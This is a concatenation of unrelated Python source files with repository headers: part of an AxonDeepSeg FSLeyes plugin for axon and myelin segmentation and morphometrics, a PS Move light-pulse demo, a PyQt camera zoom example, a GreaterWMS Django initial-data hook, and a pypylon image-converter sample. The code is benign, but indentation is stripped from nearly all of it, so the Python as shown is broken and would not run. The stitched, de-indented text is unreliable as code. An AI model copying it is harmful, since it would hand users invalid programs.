self.image_dir_path = []
self.most_recent_watershed_mask_name = None
# Toggle off the X and Y canvas
oopts = ortho.sceneOpts
oopts.showXCanvas = False
oopts.showYCanvas = False
# Toggle off the cursor
oopts.showCursor = False
# Toggle off the radiological orientation
self.displayCtx.radioOrientation = False
# Invert the Y display
self.frame.viewPanels[0].frame.viewPanels[0].getZCanvas().opts.invertY = True
# Create a temporary directory that will hold the NIfTI files
self.ads_temp_dir_var = tempfile.TemporaryDirectory() #This variable needs to stay loaded to keep the temporary
# directory from being destroyed
self.ads_temp_dir = Path(self.ads_temp_dir_var.name)
# Check the version
self.verrify_version()
def on_load_png_button(self, event):
"""
This function is called when the user presses on the Load Png button. It allows the user to select a PNG or TIF
image, convert it into a NIfTI and load it into FSLeyes.
"""
# Ask the user which file he wants to convert
with wx.FileDialog(
self, "select Image file", style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST
) as file_dialog:
if (
file_dialog.ShowModal() == wx.ID_CANCEL
): # The user cancelled the operation
return
in_file = Path(file_dialog.GetPath())
# Check if the image format is valid
image_extension = in_file.suffix
valid_extensions = [".png", ".tif", ".jpg", ".jpeg"]
if image_extension not in valid_extensions:
self.show_message("Invalid file extension")
return
# Store the directory path and image name for later use in the application of the prediction model
self.image_dir_path.append(in_file.parents[0])
self.png_image_name.append(in_file.name)
# Call the function that converts and loads the png or tif image
self.load_png_image_from_path(in_file)
def on_load_mask_button(self, event):
"""
This function is called when the user presses on the loadMask button. It allows the user to select an existing
PNG mask, convert it into a NIfTI and load it into FSLeyes.
The mask needs to contain an axon + myelin mask. The Axons should have an intensity > 200. The myelin should
have an intensity between 100 and 200. The data should be in uint8.
"""
# Ask the user to select the mask image
with wx.FileDialog(
self, "select mask .png file", style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST
) as file_dialog:
if (
file_dialog.ShowModal() == wx.ID_CANCEL
): # The user cancelled the operation
return
in_file = Path(file_dialog.GetPath())
# Check if the image format is valid
image_extension = in_file.suffix
valid_extensions = [".png", ".tif", ".jpg", ".jpeg"]
if image_extension not in valid_extensions:
self.show_message("Invalid file extension")
return
# Get the image data
img_png2D = ads_utils.imread(in_file)
image_name = in_file.stem
# Extract the Axon mask
axon_mask = img_png2D > 200
axon_mask = params.intensity['binary'] * np.array(axon_mask, dtype=np.uint8)
# Extract the Myelin mask
myelin_mask = (img_png2D > 100) & (img_png2D < 200)
myelin_mask = params.intensity['binary'] * np.array(myelin_mask, dtype=np.uint8)
# Load the masks into FSLeyes
axon_outfile = self.ads_temp_dir / (image_name + "-axon.png")
ads_utils.imwrite(axon_outfile, axon_mask)
self.load_png_image_from_path(axon_outfile, is_mask=True, colormap="blue")
myelin_outfile = self.ads_temp_dir / (image_name + "-myelin.png")
ads_utils.imwrite(myelin_outfile, myelin_mask)
self.load_png_image_from_path(myelin_outfile, is_mask=True, colormap="red")
def on_apply_model_button(self, event):
"""
This function is called when the user presses on the ApplyModel button. It is used to apply the prediction model
selected in the combobox. The segmentation masks are then loaded into FSLeyes
"""
# Declare the default resolution of the model
resolution = 0.1
# Get the image name and directory
image_overlay = self.get_visible_image_overlay()
if self.get_visible_image_overlay() is None:
return
n_loaded_images = len(self.png_image_name)
image_name = None
image_directory = None
for i in range(n_loaded_images):
if image_overlay.name == (Path(self.png_image_name[i])).stem:
image_name = self.png_image_name[i]
image_directory = self.image_dir_path[i]
if (image_name is None) or (image_directory is None):
self.show_message(
"Couldn't find the path to the loaded image. "
"Please use the plugin's image loader to import the image you wish to segment. "
)
return
image_path = image_directory / image_name
image_name_no_extension = Path(image_name).stem
# Get the selected model
selected_model = self.model_combobox.GetStringSelection()
if selected_model == "":
self.show_message("Please select a model")
return
# Get the path of the selected model
if any(selected_model in models for models in ads_utils.get_existing_models_list()):
dir_path = Path(AxonDeepSeg.__file__).parents[0]
model_path = dir_path / "models" / selected_model
else:
self.show_message("Please select a model")
return
# If the TEM model is selected, modify the resolution
if "TEM" in selected_model.upper():
resolution = 0.01
# Check if the pixel size txt file exist in the imageDirPath
pixel_size_exists = (image_directory / "pixel_size_in_micrometer.txt").exists()
# if it doesn't exist, ask the user to input the pixel size
if pixel_size_exists is False:
with wx.TextEntryDialog(
self, "Enter the pixel size in micrometer", value="0.07"
) as text_entry:
if text_entry.ShowModal() == wx.ID_CANCEL:
return
pixel_size_str = text_entry.GetValue()
pixel_size_float = float(pixel_size_str)
else: # read the pixel size
with open(str(image_directory / "pixel_size_in_micrometer.txt"), 'r') as resolution_file:
    pixel_size_float = float(resolution_file.read())
# Load model configs and apply prediction
model_configfile = model_path / "config_network.json"
with open(model_configfile.__str__(), "r") as fd:
config_network = json.loads(fd.read())
segment_image(
image_path,
model_path,
self.settings.overlap_value,
config_network,
resolution,
acquired_resolution=pixel_size_float * self.settings.zoom_factor,
verbosity_level=3
)
# The axon_segmentation function creates the segmentation masks and stores them as PNG files in the same folder
# as the original image file.
# Load the axon and myelin masks into FSLeyes
axon_mask_path = image_directory / (image_name_no_extension + str(axon_suffix))
myelin_mask_path = image_directory / (image_name_no_extension + str(myelin_suffix))
self.load_png_image_from_path(axon_mask_path, is_mask=True, colormap="blue")
self.load_png_image_from_path(myelin_mask_path, is_mask=True, colormap="red")
self.pixel_size_float = pixel_size_float
return self
def on_save_segmentation_button(self, event):
"""
This function saves the active myelin and axon masks as PNG images. Three (3) images are generated in a folder
selected by the user : one with the axon mask, one with the myelin mask and one with both.
"""
# Find the visible myelin and axon masks
axon_mask_overlay = self.get_corrected_axon_overlay()
if axon_mask_overlay is None:
axon_mask_overlay = self.get_visible_axon_overlay()
myelin_mask_overlay = self.get_visible_myelin_overlay()
if (axon_mask_overlay is None) or (myelin_mask_overlay is None):
return
# Ask the user where to save the segmentation
with wx.DirDialog(
self,
"select the directory in which the segmentation will be save",
defaultPath="",
style=wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST,
) as file_dialog:
if file_dialog.ShowModal() == wx.ID_CANCEL:
return
save_dir = Path(file_dialog.GetPath())
# store the data of the masks in variables as numpy arrays.
# Note: since PIL uses a different convention for the X and Y coordinates, some array manipulation has to be
# done.
# Note 2 : The image array loaded in FSLeyes is flipped. We need to flip it back
myelin_array = np.array(
myelin_mask_overlay[:, :, 0], copy=True, dtype=np.uint8
)
myelin_array = np.flipud(myelin_array)
myelin_array = np.rot90(myelin_array, k=1, axes=(1, 0))
axon_array = np.array(
axon_mask_overlay[:, :, 0], copy=True, dtype=np.uint8
)
axon_array = np.flipud(axon_array)
axon_array = np.rot90(axon_array, k=1, axes=(1, 0))
# Make sure the masks have the same size
if myelin_array.shape != axon_array.shape:
self.show_message("invalid visible masks dimensions")
return
# Remove the intersection
myelin_array, axon_array, intersection = postprocessing.remove_intersection(
myelin_array, axon_array, priority=1, return_overlap=True)
if intersection.sum() > 0:
self.show_message(
"There is an overlap between the axon mask and the myelin mask. The myelin will have priority.")
# Scale the pixel values of the masks to 255 for image saving
myelin_array = myelin_array * params.intensity['binary']
axon_array = axon_array * params.intensity['binary']
image_name = myelin_mask_overlay.name[:-len("_seg-myelin")]
myelin_and_axon_array = (myelin_array // 2 + axon_array).astype(np.uint8)
ads_utils.imwrite(filename=save_dir / (image_name + str(axonmyelin_suffix)), img=myelin_and_axon_array)
ads_utils.imwrite(filename=save_dir / (image_name + str(myelin_suffix)), img=myelin_array)
ads_utils.imwrite(filename=save_dir / (image_name + str(axon_suffix)), img=axon_array)
def on_run_watershed_button(self, event):
"""
This function is called when the user presses the runWatershed button. It creates a watershed mask that is
used to locate the connections between the axon-myelin objects.
The runWatershed button is currently commented, so this function is unused at the moment.
"""
# Find the visible myelin and axon masks
axon_mask_overlay = self.get_visible_axon_overlay()
myelin_mask_overlay = self.get_visible_myelin_overlay()
if (axon_mask_overlay is None) or (myelin_mask_overlay is None):
return
# Extract the data from the overlays
axon_array = axon_mask_overlay[:, :, 0]
myelin_array = myelin_mask_overlay[:, :, 0]
# Make sure the masks have the same size
if myelin_array.shape != axon_array.shape:
self.show_message("invalid visible masks dimensions")
return
# If a watershed mask already exists, remove it.
for an_overlay in self.overlayList:
if (self.most_recent_watershed_mask_name is not None) and (
an_overlay.name == self.most_recent_watershed_mask_name
):
self.overlayList.remove(an_overlay)
# Compute the watershed mask
watershed_data = self.get_watershed_segmentation(axon_array, myelin_array)
# Save the watershed mask as a png then load it as an overlay
watershed_image_array = np.rot90(watershed_data, k=3, axes=(1, 0))
watershed_image = Image.fromarray(watershed_image_array)
file_name = str(self.ads_temp_dir / "watershed_mask.png")
watershed_image.save(file_name)
watershed_mask_overlay = self.load_png_image_from_path(
file_name, add_to_overlayList=False
)
watershed_mask_overlay[:, :, 0] = watershed_data
self.overlayList.append(watershed_mask_overlay)
# Apply a "random" colour mapping to the watershed mask
opts = self.displayCtx.getOpts(watershed_mask_overlay)
opts.cmap = "random"
self.most_recent_watershed_mask_name = "watershed_mask"
def on_fill_axons_button(self, event):
"""
This function is called when the fillAxon button is pressed by the user. It uses a flood fill algorithm to fill
the inside of the myelin objects with the axon mask
"""
# Find the visible myelin and axon mask
myelin_mask_overlay = self.get_visible_myelin_overlay()
axon_mask_overlay = self.get_visible_axon_overlay()
if myelin_mask_overlay is None:
return
if axon_mask_overlay is None:
return
# Extract the data from the overlays
myelin_array = myelin_mask_overlay[:, :, 0]
axon_array = axon_mask_overlay[:, :, 0]
# Perform the floodfill operation
axon_extracted_array = postprocessing.floodfill_axons(axon_array, myelin_array)
axon_corr_array = np.flipud(axon_extracted_array)
axon_corr_array = params.intensity['binary'] * np.rot90(axon_corr_array, k=1, axes=(1, 0))
file_name = self.ads_temp_dir / (myelin_mask_overlay.name[:-len("-myelin")] + "-axon-corr.png")
ads_utils.imwrite(filename=file_name, img=axon_corr_array)
self.load_png_image_from_path(file_name, is_mask=True, colormap="blue")
def on_compute_morphometrics_button(self, event):
"""
Compute morphometrics and save them to an Excel file.
"""
# Get pixel size
try:
pixel_size = self.pixel_size_float
except AttributeError:  # pixel_size_float is only set after a prediction model has been applied
with wx.TextEntryDialog(
self, "Enter the pixel size in micrometer", value="0.07"
) as text_entry:
if text_entry.ShowModal() == wx.ID_CANCEL:
return
pixel_size_str = text_entry.GetValue()
pixel_size = float(pixel_size_str)
# Find the visible myelin and axon masks
axon_mask_overlay = self.get_corrected_axon_overlay()
if axon_mask_overlay is None:
axon_mask_overlay = self.get_visible_axon_overlay()
myelin_mask_overlay = self.get_visible_myelin_overlay()
if (axon_mask_overlay is None) or (myelin_mask_overlay is None):
return
# store the data of the masks in variables as numpy arrays.
# Note: since PIL uses a different convention for the X and Y coordinates, some array manipulation has to be
# done.
# Note 2 : The image array loaded in FSLeyes is flipped. We need to flip it back
myelin_array = np.array(
myelin_mask_overlay[:, :, 0] * params.intensity['binary'], copy=True, dtype=np.uint8
)
myelin_array = np.flipud(myelin_array)
myelin_array = np.rot90(myelin_array, k=1, axes=(1, 0))
axon_array = np.array(
axon_mask_overlay[:, :, 0] * params.intensity['binary'], copy=True, dtype=np.uint8
)
axon_array = np.flipud(axon_array)
axon_array = np.rot90(axon_array, k=1, axes=(1, 0))
# Make sure the masks have the same size
if myelin_array.shape != axon_array.shape:
self.show_message("invalid visible masks dimensions")
return
# Save the arrays as PNG files
pred = (myelin_array // 2 + axon_array).astype(np.uint8)
pred_axon = pred > 200
pred_myelin = np.logical_and(pred >= 50, pred <= 200)
x = np.array([], dtype=[
('x0', 'f4'),
('y0', 'f4'),
('gratio','f4'),
('axon_area','f4'),
('axon_perimeter','f4'),
('myelin_area','f4'),
('axon_diam','f4'),
('myelin_thickness','f4'),
('axonmyelin_area','f4'),
('axonmyelin_perimeter','f4'),
('solidity','f4'),
('eccentricity','f4'),
('orientation','f4')
]
)
# Compute statistics
stats_array, index_image_array = compute_morphs.get_axon_morphometrics(im_axon=pred_axon, im_myelin=pred_myelin,
pixel_size=pixel_size,
axon_shape=self.settings.axon_shape,
return_index_image=True)
for stats in stats_array:
x = np.append(x,
np.array(
[(
stats['x0'],
stats['y0'],
stats['gratio'],
stats['axon_area'],
stats['axon_perimeter'],
stats['myelin_area'],
stats['axon_diam'],
stats['myelin_thickness'],
stats['axonmyelin_area'],
stats['axonmyelin_perimeter'],
stats['solidity'],
stats['eccentricity'],
stats['orientation']
)],
dtype=x.dtype)
)
with wx.FileDialog(self, "Save morphometrics file", wildcard="Excel files (*.xlsx)|*.xlsx",
defaultFile="axon_morphometrics.xlsx", style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT) as fileDialog:
if fileDialog.ShowModal() == wx.ID_CANCEL:
return # the user changed their mind
# save the current contents in the file
pathname = fileDialog.GetPath()
if not (pathname.lower().endswith((".xlsx", ".csv"))): # If the user didn't add the extension, add it here
pathname = pathname + ".xlsx"
try:
# Export to excel
pd.DataFrame(x).to_excel(pathname)
except IOError:
wx.LogError("Cannot save current data in file '%s'." % pathname)
# Generate and load the index image
original_image_name = (axon_mask_overlay.name).split("-axon")[0]
original_image_name = original_image_name.split("_seg")[0]
index_outfile = Path(pathname).parents[0] / (original_image_name + str(index_suffix))
ads_utils.imwrite(index_outfile, index_image_array)
self.load_png_image_from_path(index_outfile, is_mask=False, colormap="yellow")
# Generate the colored image with indexes
axon_array, myelin_array = postprocessing.remove_intersection(axon_array//255, myelin_array//255)
axonmyelin_image = axon_array * params.intensity["axon"] + myelin_array * params.intensity["myelin"]
axonmyelin_outfile = self.ads_temp_dir / axonmyelin_suffix
ads_utils.imwrite(axonmyelin_outfile, axonmyelin_image)
postprocessing.generate_and_save_colored_image_with_index_numbers(
filename= Path(pathname).parents[0] / (original_image_name + str(axonmyelin_index_suffix)),
axonmyelin_image_path= axonmyelin_outfile,
index_image_array=index_image_array
)
return
def get_watershed_segmentation(self, im_axon, im_myelin, return_centroids=False):
"""
Parts of this function were copied from the code found in this document :
https://github.com/neuropoly/axondeepseg/blob/master/AxonDeepSeg/morphometrics/compute_morphometrics.py
In the future, the referenced script should be modified in order to avoid repetition.
:param im_axon: the binary mask corresponding to axons
:type im_axon: ndarray
:param im_myelin: the binary mask corresponding to the myelin
:type im_myelin: ndarray
:param return_centroids: (optional) if this is set to true, the function will also return the centroids of the
axon objects as a list of tuples
:type return_centroids: bool
:return: the label corresponding to the axon+myelin objects
:rtype: ndarray
"""
# Label each axon object
im_axon_label = measure.label(im_axon)
# Measure properties for each axon object
axon_objects = measure.regionprops(im_axon_label)
# Deal with myelin mask
if im_myelin is not None:
# sum axon and myelin masks
im_axonmyelin = im_axon + im_myelin
# Compute distance between each pixel and the background. Note: this distance is calculated from the im_axon,
# not from the im_axonmyelin image, because we know that each axon object is already isolated, therefore the
# distance metric will be more useful for the watershed algorithm below.
distance = ndi.distance_transform_edt(im_axon)
# local_maxi = feature.peak_local_max(distance, indices=False, footprint=np.ones((31, 31)), labels=axonmyelin)
# Get axon centroid as int (not float) to be used as index
ind_centroid = (
[int(props.centroid[0]) for props in axon_objects],
[int(props.centroid[1]) for props in axon_objects],
)
# Create an image with axon centroids, whose value corresponds to the value of the axon object
im_centroid = np.zeros_like(im_axon, dtype="uint16")
for i in range(len(ind_centroid[0])):
# Note: The value "i" corresponds to the label number of im_axon_label
im_centroid[ind_centroid[0][i], ind_centroid[1][i]] = i + 1
# Watershed segmentation of axonmyelin using distance map
im_axonmyelin_label = morphology.watershed(
-distance, im_centroid, mask=im_axonmyelin
)
if return_centroids is True:
return im_axonmyelin_label, ind_centroid
else:
return im_axonmyelin_label
def load_png_image_from_path(
self, image_path, is_mask=False, add_to_overlayList=True, colormap="greyscale"
):
"""
This function converts a 2D image into a NIfTI image and loads it as an overlay.
The parameter add_to_overlayList controls whether the overlay is displayed in FSLeyes.
:param image_path: The location of the image, including the name and the .extension
:type image_path: Path
:param is_mask: (optional) Whether or not this is a segmentation mask. It will be treated as a normal
image by default.
:type is_mask: bool
:param add_to_overlayList: (optional) Whether or not to add the image to the overlay list. If so, the image will
be displayed in the application. This parameter is True by default.
:type add_to_overlayList: bool
:param colormap: (optional) the colormap of image that will be displayed. This parameter is set to greyscale by
default.
:type colormap: string
:return: the FSLeyes overlay corresponding to the loaded image.
:rtype: overlay
"""
# Open the 2D image
img_png2D = ads_utils.imread(image_path)
if is_mask is True:
img_png2D = img_png2D // params.intensity['binary'] # Segmentation masks should be binary
# Flip the image on the Y axis so that the morphometrics file shows the right coordinates
img_png2D = np.flipud(img_png2D)
# Convert image data into a NIfTI image
# Note: PIL and NiBabel use different axis conventions, so some array manipulation has to be done.
img_NIfTI = nib.Nifti1Image(
np.rot90(img_png2D, k=1, axes=(1, 0)), np.eye(4)
)
# Save the NIfTI image in a temporary directory
img_name = image_path.stem
out_file = self.ads_temp_dir.__str__() + "/" + img_name + ".nii.gz"
nib.save(img_NIfTI, out_file)
# Load the NIfTI image as an overlay
img_overlay = ovLoad.loadOverlays(paths=[out_file], inmem=True, blocking=True)[
0
]
# Display the overlay
if add_to_overlayList is True:
self.overlayList.append(img_overlay)
opts = self.displayCtx.getOpts(img_overlay)
opts.cmap = colormap
return img_overlay
def get_visible_overlays(self):
"""
This function returns a list of every overlay that is visible in FSLeyes.
:return: The list of the visible overlays
:rtype: list
"""
visible_overlay_list = []
for an_overlay in self.overlayList:
an_overlay_display = self.displayCtx.getDisplay(an_overlay)
if an_overlay_display.enabled is True:
visible_overlay_list.append(an_overlay)
return visible_overlay_list
def get_visible_image_overlay(self):
"""
This function is used to find the active microscopy image. This image should be visible and should NOT have the
following keywords in its name : axon, myelin, Myelin, watershed, Watershed.
:return: The visible microscopy image
:rtype: overlay
"""
visible_overlay_list = self.get_visible_overlays()
image_overlay = None
n_found_overlays = 0
if len(visible_overlay_list) == 0:
self.show_message("No overlays are displayed")
return None
if len(visible_overlay_list) == 1:
return visible_overlay_list[0]
for an_overlay in visible_overlay_list:
if (
("watershed" not in an_overlay.name)
and ("Watershed" not in an_overlay.name)
and (not an_overlay.name.endswith("-myelin"))
and (not an_overlay.name.endswith("-Myelin"))
and (not an_overlay.name.endswith("-Axon"))
and (not an_overlay.name.endswith("-axon"))
):
n_found_overlays = n_found_overlays + 1
image_overlay = an_overlay
if n_found_overlays > 1:
self.show_message("More than one microscopy image has been found")
return None
if n_found_overlays == 0:
self.show_message("No visible microscopy image has been found")
return None
return image_overlay
def get_visible_axon_overlay(self):
"""
This method finds the currently visible axon overlay
:return: The visible overlay that corresponds to the axon mask
:rtype: overlay
"""
visible_overlay_list = self.get_visible_overlays()
axon_overlay = None
n_found_overlays = 0
if len(visible_overlay_list) == 0:
self.show_message("No overlays are displayed")
return None
for an_overlay in visible_overlay_list:
if (an_overlay.name.endswith("-axon")) or (an_overlay.name.endswith("-Axon")):
n_found_overlays = n_found_overlays + 1
axon_overlay = an_overlay
if n_found_overlays > 1:
self.show_message("More than one axon mask has been found")
return None
if n_found_overlays == 0:
self.show_message("No visible axon mask has been found")
return None
return axon_overlay
def get_corrected_axon_overlay(self):
"""
This method finds the visible corrected axon overlay if it exists
:return: The visible corrected axon overlay
:rtype: overlay
"""
visible_overlay_list = self.get_visible_overlays()
axon_overlay = None
n_found_overlays = 0
if len(visible_overlay_list) == 0:
self.show_message("No overlays are displayed")
return None
for an_overlay in visible_overlay_list:
if (an_overlay.name.endswith("-axon-corr")) or (an_overlay.name.endswith("-Axon-corr")):
n_found_overlays = n_found_overlays + 1
axon_overlay = an_overlay
if n_found_overlays > 1:
self.show_message("More than one corrected axon mask has been found")
return None
if n_found_overlays == 0:
return None
return axon_overlay
def get_visible_myelin_overlay(self):
"""
This method finds the currently visible myelin overlay
:return: The visible overlay that corresponds to the myelin mask
:rtype: overlay
"""
visible_overlay_list = self.get_visible_overlays()
myelin_overlay = None
n_found_overlays = 0
if len(visible_overlay_list) == 0:
self.show_message("No overlays are displayed")
return None
for an_overlay in visible_overlay_list:
if (an_overlay.name.endswith("-myelin")) or (an_overlay.name.endswith("-Myelin")):
n_found_overlays = n_found_overlays + 1
myelin_overlay = an_overlay
if n_found_overlays > 1:
self.show_message("More than one myelin mask has been found")
return None
if n_found_overlays == 0:
self.show_message("No visible myelin mask has been found")
return None
return myelin_overlay
def show_message(self, message, caption="Error"):
"""
This function is used to show a popup message on the FSLeyes interface.
:param message: The message to be displayed.
:type message: String
:param caption: (Optional) The caption of the message box.
:type caption: String
"""
with wx.MessageDialog(
self,
message,
caption=caption,
style=wx.OK | wx.CENTRE,
pos=wx.DefaultPosition,
) as msg:
msg.ShowModal()
def verrify_version(self):
"""
This function checks if the plugin version is the same as the one in the AxonDeepSeg directory
"""
ads_path = Path(AxonDeepSeg.__file__).parents[0]
plugin_path_parts = ads_path.parts[:-1]
plugin_path = Path(*plugin_path_parts)
plugin_file = plugin_path / "ads_plugin.py"
# Check if the plugin file exists
plugin_file_exists = plugin_file.exists()
if plugin_file_exists is False:
return
# Check the version of the plugin
with open(plugin_file.__str__()) as plugin_file_reader:
plugin_file_lines = plugin_file_reader.readlines()
plugin_file_lines = [x.strip() for x in plugin_file_lines]
version_line = 'VERSION = "' + VERSION + '"'
plugin_is_up_to_date = True
version_found = False
for lines in plugin_file_lines:
if (lines.startswith("VERSION = ")):
version_found = True
if not (lines == version_line):
plugin_is_up_to_date = False
if (version_found is False) or (plugin_is_up_to_date is False):
message = (
"A more recent version of the AxonDeepSeg plugin was found in your AxonDeepSeg installation folder. "
"You will need to replace the current FSLeyes plugin which the new one. "
"To proceed, go to: file -> load plugin -> ads_plugin.py. Then, restart FSLeyes."
)
self.show_message(message, "Warning")
return
def get_citation(self):
"""
This function returns the AxonDeepSeg paper citation.
:return: The AxonDeepSeg citation
:rtype: string
"""
return (
"If you use this work in your research, please cite it as follows: \n"
"<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2018). "
"AxonDeepSeg: automatic axon and myelin segmentation from microscopy data using convolutional "
"neural networks. Scientific Reports, 8(1), 3816. "
"Link to paper: https://doi.org/10.1038/s41598-018-22181-4. \n"
"Copyright (c) 2018 NeuroPoly (Polytechnique Montreal)"
)
def get_logo(self):
"""
This function finds the AxonDeepSeg logo saved as a png image and returns it as a wx bitmap image.
:return: The AxonDeepSeg logo
:rtype: wx.StaticBitmap
"""
ads_path = Path(AxonDeepSeg.__file__).parents[0]
logo_file = ads_path / "logo_ads-alpha_small.png"
png = wx.Image(str(logo_file), wx.BITMAP_TYPE_ANY).ConvertToBitmap()
png.SetSize((png.GetWidth(), png.GetHeight()))
logo_image = wx.StaticBitmap(
self, -1, png, wx.DefaultPosition, (png.GetWidth(), png.GetHeight())
)
return logo_image
@staticmethod
def supportedViews():
"""
Tells FSLeyes which view panels this control can be added to (only the OrthoPanel here).
"""
from fsleyes.views.orthopanel import OrthoPanel
return [OrthoPanel]
@staticmethod
def defaultLayout():
"""
This method makes the control panel appear on the left of the FSLeyes window.
"""
return {"location": wx.LEFT}
|
examples/python/beat.py | eeryinkblot/psmoveapi | 306 | 12686902 |
#
# PS Move API - An interface for the PS Move Motion Controller
# Copyright (c) 2011 <NAME> <<EMAIL>>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
"""
Pulsating light demo
Press the Move button at the first beat, then press it again after 4 beats.
Watch the sphere glow up to the beat. Keep SQUARE pressed to let it glow up
every 2 beats. Keep TRIANGLE pressed to let it glow up every beat. Press the
Move button to reset, then start again (first beat, 4th beat, ...).
"""
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', 'build'))
import time
import math
import psmove
if psmove.count_connected() < 1:
print('No controller connected')
sys.exit(1)
move = psmove.PSMove()
move.set_rate_limiting(1)
if move.connection_type != psmove.Conn_Bluetooth:
print('Please connect controller via Bluetooth')
sys.exit(1)
current_beat = 0
old_buttons = 0
last_blink = 0
intensity = 0
divisor = 1
last_decrease = 0
while True:
while move.poll():
buttons = move.get_buttons()
if buttons & psmove.Btn_MOVE and not old_buttons & psmove.Btn_MOVE:
print time.time(), 'press'
if current_beat == 0:
print 'init'
current_beat = time.time()
elif current_beat < 10000:
print 'reset'
current_beat = 0
else:
print 'run!'
current_beat = time.time() - current_beat
last_blink = time.time()
if buttons & psmove.Btn_TRIANGLE:
divisor = 4
elif buttons & psmove.Btn_SQUARE:
divisor = 2
else:
divisor = 1
old_buttons = buttons
intensity *= .9999
if current_beat > 0 and current_beat < 10000:
if last_blink == 0 or last_blink + (current_beat/divisor) < time.time():
last_blink += current_beat/divisor
print current_beat, 'blink'
intensity = 255.
move.set_leds(*map(int, [intensity]*3))
move.update_leds()
|
Chapter07/question_5_example_code.py | trappn/Mastering-GUI-Programming-with-Python | 138 | 12686913 | <gh_stars>100-1000
from PyQt5 import QtWidgets as qtw
from PyQt5 import QtCore as qtc
from PyQt5 import QtMultimedia as qtmm
from PyQt5 import QtMultimediaWidgets as qtmmw
class MainWindow(qtw.QWidget):
def __init__(self):
super().__init__()
self.setLayout(qtw.QVBoxLayout())
# camera
self.camera = qtmm.QCamera()
# viewfinder
cvf = qtmmw.QCameraViewfinder()
self.camera.setViewfinder(cvf)
self.layout().addWidget(cvf)
# Form
form = qtw.QFormLayout()
self.layout().addLayout(form)
# zoom
zoomslider = qtw.QSlider(
minimum=1,
maximum=10,
sliderMoved=self.on_slider_moved,
orientation=qtc.Qt.Horizontal
)
form.addRow('Zoom', zoomslider)
self.camera.start()
self.show()
def on_slider_moved(self, value):
focus = self.camera.focus()
focus.zoomTo(1, value)
if __name__ == '__main__':
app = qtw.QApplication([])
mw = MainWindow()
app.exec()
|
binproperty/apps.py | wh8983298/GreaterWMS | 1,063 | 12686927 | <filename>binproperty/apps.py
from django.apps import AppConfig
from django.db.models.signals import post_migrate
class BinpropertyConfig(AppConfig):
name = 'binproperty'
def ready(self):
post_migrate.connect(do_init_data, sender=self)
def do_init_data(sender, **kwargs):
init_category()
def init_category():
"""
:return:None
"""
try:
from .models import ListModel as ls
if ls.objects.filter(openid__iexact='init_data').exists():
if ls.objects.filter(openid__iexact='init_data').count() != 4:
ls.objects.filter(openid__iexact='init_data').delete()
init_data = [
ls(id=1, openid='init_data', bin_property='Damage', creater='GreaterWMS'),
ls(id=2, openid='init_data', bin_property='Inspection', creater='GreaterWMS'),
ls(id=3, openid='init_data', bin_property='Normal', creater='GreaterWMS'),
ls(id=4, openid='init_data', bin_property='Holding', creater='GreaterWMS')
]
ls.objects.bulk_create(init_data, batch_size=100)
else:
init_data = [
ls(id=1, openid='init_data', bin_property='Damage', creater='GreaterWMS'),
ls(id=2, openid='init_data', bin_property='Inspection', creater='GreaterWMS'),
ls(id=3, openid='init_data', bin_property='Normal', creater='GreaterWMS'),
ls(id=4, openid='init_data', bin_property='Holding', creater='GreaterWMS')
]
ls.objects.bulk_create(init_data, batch_size=100)
except Exception:
pass
|
samples/utilityimageformatconverter.py | matt-phair/pypylon | 358 | 12686933 | <reponame>matt-phair/pypylon<filename>samples/utilityimageformatconverter.py
# Note: Before getting started, Basler recommends reading the Programmer's Guide topic
# in the pylon C++ API documentation that gets installed with pylon.
# If you are upgrading to a higher major version of pylon, Basler also
# strongly recommends reading the Migration topic in the pylon C++ API documentation.
# This sample illustrates how to use the image format
# converter class CImageFormatConverter.
# The image format converter accepts all image formats
# produced by Basler camera devices and it is able to
# convert these to a number of output formats.
# The conversion can be controlled by several parameters.
# See the converter class documentation for more details.
from pypylon import pylon
from pypylon import genicam
# This is a helper function for showing an image on the screen if Windows is used,
# and for printing the first bytes of the image.
def show_image(image, message):
print(message)
pBytes = image.Array
print("Bytes of the image: \n")
print(pBytes)
try:
# Create the converter and set parameters.
converter = pylon.ImageFormatConverter()
converter.OutputPixelFormat = pylon.PixelType_Mono8
# Try to get a grab result for demonstration purposes.
print("Waiting for an image to be grabbed.")
try:
camera = pylon.InstantCamera(pylon.TlFactory.GetInstance().CreateFirstDevice())
grabResult = camera.GrabOne(1000)
show_image(grabResult, "Grabbed image.")
targetImage = pylon.PylonImage.Create(pylon.PixelType_Mono8, grabResult.GetWidth(), grabResult.GetHeight())
print(converter.IsSupportedOutputFormat(pylon.PixelType_Mono8))
# Now we can check if conversion is required.
if converter.ImageHasDestinationFormat(grabResult):
# No conversion is needed. It can be skipped for saving processing
# time.
show_image(grabResult, "Grabbed image.")
else:
# Conversion is needed.
show_image(grabResult, "Grabbed image.")
show_image(targetImage, "Converted image.")
except genicam.GenericException as e:
print("Could not grab an image: ", e.GetDescription())
except genicam.GenericException as e:
print("An exception occurred. ", e.GetDescription())
